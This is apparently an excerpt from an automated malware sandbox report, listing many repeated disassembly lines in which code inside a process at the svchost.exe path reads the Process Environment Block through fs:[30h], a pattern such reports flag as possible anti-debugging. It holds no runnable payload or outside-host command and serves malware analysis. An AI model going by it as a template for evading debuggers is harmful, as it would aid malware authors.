          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]2_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]2_2_03ABE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]2_2_03AC69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]2_2_03A649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03AFA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]2_2_03AB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]2_2_03AC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]2_2_03ABC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]2_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]2_2_03ABC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]2_2_03AB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]2_2_03A30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]2_2_03ABC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03AFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A830 mov eax, dword ptr fs:[00000030h]2_2_03A6A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC810 mov eax, dword ptr fs:[00000030h]2_2_03ABC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A42840 mov ecx, dword ptr fs:[00000030h]2_2_03A42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60854 mov eax, dword ptr fs:[00000030h]2_2_03A60854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CF80 mov eax, dword ptr fs:[00000030h]2_2_03A6CF80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03A4CFE0
